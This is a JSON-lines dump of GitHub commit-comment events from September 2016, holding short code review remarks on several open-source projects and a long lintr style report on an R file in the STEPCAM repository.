{"id":"4596116872","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113352,"position":136,"line":136,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:07:42Z","updated_at":"2016-09-21T13:07:42Z","body":"如果minicap不存在，你怎么确定minicap是支持的呢？"}},"created_at":"2016-09-21T13:07:42Z"}
{"id":"4596117033","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113353,"position":null,"line":null,"path":null,"commit_id":"5b1320d799408e5055c0e3baaa2c70396e78d7c4","created_at":"2016-09-21T13:07:43Z","updated_at":"2016-09-21T13:07:43Z","body":"Out of curiosity, do you know what Docker images did they use for [plugin.png](https://github.com/weaveworks/scope/blob/master/imgs/plugin.png)?\r\n\r\nThey seem to use a \"httpd\" Docker image and a \"httpclient\" Docker image.\r\n\r\nBut in your tutorial, you will use \"httpd\" in a Docker container and the client is directly executed on the host."}},"created_at":"2016-09-21T13:07:43Z"}
{"id":"4596117324","type":"CommitCommentEvent","actor":{"login":"ChristianBeer"},"repo":{"name":"BOINC/boinc"},"payload":{"comment":{"id":19113354,"position":15,"line":800,"path":"lib/str_util.cpp","commit_id":"01ea1ef8fb659c4488425f9bea380009ebe6843f","created_at":"2016-09-21T13:07:46Z","updated_at":"2016-09-21T13:07:46Z","body":"The need for `apath` is this:\r\n```\r\npathtest.cpp:73:45: error: invalid conversion from ‘const char*’ to ‘char*’ [-fpermissive]\r\n     const char* bname = basename(fpath.c_str());\r\n                                  ~~~~~~~~~~~^~\r\n```\r\nYou also can't `const_cast<char *>(fpath.c_str())` as `basename()` potentially changes the array which is undefined behavior. So you need to copy `fpath` before calling `basename()` and you need to copy the string where `bname` points to into `fname` (which in your example needs to be allocated by the caller).\r\n\r\nSince the library is also used on Windows (as the includes in `str_util.cpp` suggest) portability is the main issue here. There is an equivalent for `basename()` on Windows that can be used instead but I don't see the need to implement this when there is an implementation using only `std::string` which is available on all platforms."}},"created_at":"2016-09-21T13:07:46Z"}
{"id":"4596122115","type":"CommitCommentEvent","actor":{"login":"Bartoshko"},"repo":{"name":"Bartoshko/HelloWorld"},"payload":{"comment":{"id":19113369,"position":2,"line":2,"path":"README.md","commit_id":"53338b8dcf3624ec62d3ef7b9cd82e9c3901dee8","created_at":"2016-09-21T13:08:39Z","updated_at":"2016-09-21T13:08:39Z","body":"+ Repository for learning how to work on GitHub"}},"created_at":"2016-09-21T13:08:39Z"}
{"id":"4596122692","type":"CommitCommentEvent","actor":{"login":"alegarra"},"repo":{"name":"alegarra/gs3"},"payload":{"comment":{"id":19113371,"position":null,"line":null,"path":null,"commit_id":"29bc6b86cf4e199b1200051bf3bca7a0c43df64e","created_at":"2016-09-21T13:08:45Z","updated_at":"2016-09-21T13:08:45Z","body":"This commit was done from the command line to test"}},"created_at":"2016-09-21T13:08:45Z"}
{"id":"4596122937","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113372,"position":145,"line":145,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:08:47Z","updated_at":"2016-09-21T13:08:47Z","body":"这个函数去掉吧，没什么卵用"}},"created_at":"2016-09-21T13:08:47Z"}
{"id":"4596123664","type":"CommitCommentEvent","actor":{"login":"splatEric"},"repo":{"name":"openeyes/signature-capture"},"payload":{"comment":{"id":19113375,"position":null,"line":null,"path":null,"commit_id":"b7e1cbfdd7c5c89b95899b3f5b00130216cd0970","created_at":"2016-09-21T13:08:54Z","updated_at":"2016-09-21T13:08:54Z","body":"Can this go into a separate feature branch please as OpenEyes is not ready for this change, so we would want to deploy this at the same time."}},"created_at":"2016-09-21T13:08:54Z"}
{"id":"4596124627","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113380,"position":6,"line":6,"path":"examples/plugins/http-requests/httpd/test.sh","commit_id":"5b1320d799408e5055c0e3baaa2c70396e78d7c4","created_at":"2016-09-21T13:09:05Z","updated_at":"2016-09-21T13:09:05Z","body":"Why do you need a long term connection? Is it a workaround?"}},"created_at":"2016-09-21T13:09:05Z"}
{"id":"4596125571","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113382,"position":100,"line":100,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T13:09:14Z","updated_at":"2016-09-21T13:09:14Z","body":"You could probably split it into two sentences (replace the comma with a dot).\r\nAgain s/section/something else, like field or array field?"}},"created_at":"2016-09-21T13:09:14Z"}
{"id":"4596126830","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113385,"position":167,"line":167,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:09:27Z","updated_at":"2016-09-21T13:09:27Z","body":"这函数代码太多了"}},"created_at":"2016-09-21T13:09:27Z"}
{"id":"4596126878","type":"CommitCommentEvent","actor":{"login":"djragusa"},"repo":{"name":"djragusa/djragusa.github.io"},"payload":{"comment":{"id":19113386,"position":null,"line":null,"path":null,"commit_id":"d165cb15edaf6e7dea20ab5f49a50f5ef9dfa83b","created_at":"2016-09-21T13:09:27Z","updated_at":"2016-09-21T13:09:27Z","body":"Update"}},"created_at":"2016-09-21T13:09:27Z"}
{"id":"4596127430","type":"CommitCommentEvent","actor":{"login":"splatEric"},"repo":{"name":"openeyes/signature-capture"},"payload":{"comment":{"id":19113387,"position":null,"line":null,"path":null,"commit_id":"8698ae794b177715940eeb83fc959aca50725cf6","created_at":"2016-09-21T13:09:33Z","updated_at":"2016-09-21T13:09:33Z","body":"Sorry, this is where my comment about the feature branch should have gone."}},"created_at":"2016-09-21T13:09:33Z"}
{"id":"4596129898","type":"CommitCommentEvent","actor":{"login":"Eric-Guo"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19113393,"position":null,"line":null,"path":null,"commit_id":"e53bd839653a7181ab53539603ad45869f195bb8","created_at":"2016-09-21T13:10:01Z","updated_at":"2016-09-21T13:10:01Z","body":"好像有问题，现在我VIP账号也不能回帖了，显示“当前设置新手用户不能在 22:00 ~ 9:00 发帖。”"}},"created_at":"2016-09-21T13:10:01Z"}
{"id":"4596132513","type":"CommitCommentEvent","actor":{"login":"splatEric"},"repo":{"name":"openeyes/signature-capture"},"payload":{"comment":{"id":19113401,"position":null,"line":null,"path":null,"commit_id":"c8e5b0fd1b17bd5e411b053b4ef032d5291cb81a","created_at":"2016-09-21T13:10:28Z","updated_at":"2016-09-21T13:10:28Z","body":"I don't know whether its this commit or an earlier one, but currently the button to trigger the camera opening is not showing for us on iphone or android."}},"created_at":"2016-09-21T13:10:28Z"}
{"id":"4596133113","type":"CommitCommentEvent","actor":{"login":"tonyravioli"},"repo":{"name":"tonyravioli/dongerdong"},"payload":{"comment":{"id":19113402,"position":null,"line":null,"path":null,"commit_id":"c4ecd4f96964726fad0698036c4358373cf7efea","created_at":"2016-09-21T13:10:35Z","updated_at":"2016-09-21T13:10:35Z","body":"I want to be able to rate-limit that \"replyback\" feature (lines 74-78 before commit) without having to repeat all the code again. Will throw the rate limiting in a function soon. Also, the self.sourcehistory logic is ripped almost verbatim from v0.2.1 💯 "}},"created_at":"2016-09-21T13:10:35Z"}
{"id":"4596134885","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113409,"position":null,"line":null,"path":null,"commit_id":"5b1320d799408e5055c0e3baaa2c70396e78d7c4","created_at":"2016-09-21T13:10:54Z","updated_at":"2016-09-21T13:10:54Z","body":"I do not know what they used, I used the hello world go example from `rkt`"}},"created_at":"2016-09-21T13:10:54Z"}
{"id":"4596136177","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19113411,"position":null,"line":null,"path":null,"commit_id":"68ff8685f69ed017932882672450a88658e039b4","created_at":"2016-09-21T13:11:09Z","updated_at":"2016-09-21T13:11:09Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/518/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2076)."}},"created_at":"2016-09-21T13:11:09Z"}
{"id":"4596137312","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113415,"position":206,"line":206,"path":"minicap.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T13:11:21Z","updated_at":"2016-09-21T13:11:21Z","body":"可以试试远程读取，另外本地的临时目录创建了别忘了删掉，别光删手机上的"}},"created_at":"2016-09-21T13:11:21Z"}
{"id":"4596138711","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19113420,"position":null,"line":null,"path":null,"commit_id":"d83b7c9a2749146f85df41774b037105f510ae7d","created_at":"2016-09-21T13:11:33Z","updated_at":"2016-09-21T13:11:33Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:79:60:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L79) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                                           ^\n```\n[R/ABC_SMC.R:85:52:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L85) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"one of the community summary statistics \n                                                   ^\n```\n[R/ABC_SMC.R:89:10:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:89:10:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L89) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:18:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:13:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:17:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:16:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:21:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:26:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:16:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:7:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L120) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:120:10:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:23:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L120) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:120:29:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:142:5:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:28:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:28:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L143) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:151:12:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:151:30:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:155:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L155) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:155:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L155) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:157:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L159) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:169:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L169) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:173:40:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L173) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                       ^\n```\n[R/ABC_SMC.R:173:53:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L173) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                                   ~^~\n```\n[R/ABC_SMC.R:174:40:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L174) *style:* **Put spaces around all infix operators.**\n```r\n​                              row.names=c(1:taxa))\n                                      ~^~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L178) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:179:20:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:50:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                                                 ^\n```\n[R/ABC_SMC.R:180:64:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                m = res[[1]], nb.sp = res[[2]]) \n                                                               ^\n```\n[R/ABC_SMC.R:181:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:183:29:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L183) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FRic <- FD_output$FRic \n                            ^\n```\n[R/ABC_SMC.R:185:29:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L185) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FEve <- FD_output$FEve \n                            ^\n```\n[R/ABC_SMC.R:187:29:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L187) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FDiv <- FD_output$FDiv \n                            ^\n```\n[R/ABC_SMC.R:196:69:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # calculate distance of trait mean between simulated community \n                                                                    ^\n```\n[R/ABC_SMC.R:200:72:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L200) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean \n                                                                       ^\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:1:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L204) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:207:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:14:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:18:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:17:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:24:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <- 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:24:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <-\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:13:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:9:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:27:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:13:](https://github.com/thijsjanzen/STEPCAM/blob/d83b7c9a2749146f85df41774b037105f510ae7d/R/ABC_SMC.R#L225) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            